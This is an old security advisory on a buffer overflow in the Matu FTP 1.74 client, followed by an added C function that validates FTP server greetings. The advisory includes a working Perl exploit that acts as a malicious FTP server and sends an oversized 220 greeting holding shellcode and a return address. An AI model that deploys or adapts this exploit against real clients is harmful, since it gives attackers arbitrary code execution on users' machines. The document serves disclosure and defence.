
Matu FTP remote root exploit



23rd Apr 2002 [SBWID-5303]
COMMAND

	Matu FTP remote root exploit

SYSTEMS AFFECTED

	Matu FTP Version 1.74

PROBLEM

	Kanatoko [http://www.jumperz.net/] found:

	The buffer overflow occurs when a long string like

	220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>

	is received by Matu FTP at the beginning of an FTP session. This
	vulnerability allows a malicious FTP server to execute arbitrary code
	on client hosts.

	This exploit code is invoked as an FTP server through inetd.
	

	#!/usr/local/bin/perl

	#------------------------------------------------------
	# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
	# ( run under inetd )
	# written by Kanatoko <anvil@jumperz.net>
	# http://www.jumperz.net/
	#------------------------------------------------------
	$|=1;

	        #egg written by UNYUN (http://www.shadowpenguin.org/)
	$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
	$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
	$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
	$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
	$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
	$egg .= "notepad.exe";

	        #egg_address = 0x0012F43C
	$buf = "\x90" x 217;
	$buf .= $egg;
	$buf .= "A" x 2;
	$buf .= "\x3C\xF4\x12\x00";
	$buf .= "B" x 80;

	print "220 $buf\r\n";


SOLUTION

	None yet
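
An FTP client can refuse an oversized or binary greeting before it is copied into any fixed-size buffer. The C function below is an added example, not code from the advisory or from Matu FTP; the name ftp_parse_reply, the 512-byte line cap and the printable-ASCII-only policy are assumptions made for the example.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define FTP_REPLY_MAX 512   /* assumed cap on one reply line, CRLF included */

enum ftp_reply_status { FTP_OK = 0, FTP_TOO_LONG, FTP_MALFORMED, FTP_INCOMPLETE };

/*
 * Validate one CRLF-terminated reply line held in raw network bytes and copy
 * its text into out. Rejects rather than truncates, and never writes more than
 * out_size bytes. On FTP_OK, *code is the 3-digit reply code.
 */
enum ftp_reply_status ftp_parse_reply(const unsigned char *in, size_t in_len,
                                      char *out, size_t out_size, int *code)
{
    size_t i, k, limit, text_len;

    if (out_size == 0) return FTP_MALFORMED;
    out[0] = '\0';

    /* Search for CRLF, but never look past FTP_REPLY_MAX bytes. */
    limit = in_len < FTP_REPLY_MAX ? in_len : FTP_REPLY_MAX;
    for (i = 0; i + 1 < limit; i++)
        if (in[i] == '\r' && in[i + 1] == '\n') break;
    if (i + 1 >= limit)   /* no CRLF found: over the cap, or need more data */
        return in_len >= FTP_REPLY_MAX ? FTP_TOO_LONG : FTP_INCOMPLETE;

    /* i is the line length without CRLF; require "ddd" plus ' ' or '-'. */
    if (i < 4 || !isdigit(in[0]) || !isdigit(in[1]) || !isdigit(in[2]) ||
        (in[3] != ' ' && in[3] != '-'))
        return FTP_MALFORMED;

    /* Length check against the destination happens before any copy. */
    text_len = i - 4;
    if (text_len >= out_size) return FTP_TOO_LONG;

    /* Assumed policy: printable ASCII only, so raw binary bytes are refused. */
    for (k = 0; k < text_len; k++)
        if (in[4 + k] < 0x20 || in[4 + k] > 0x7e) return FTP_MALFORMED;

    memcpy(out, in + 4, text_len);
    out[text_len] = '\0';
    *code = (in[0] - '0') * 100 + (in[1] - '0') * 10 + (in[2] - '0');
    return FTP_OK;
}
```

On any status other than FTP_OK or FTP_INCOMPLETE the caller should close the control connection instead of trying to resynchronise with the server.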

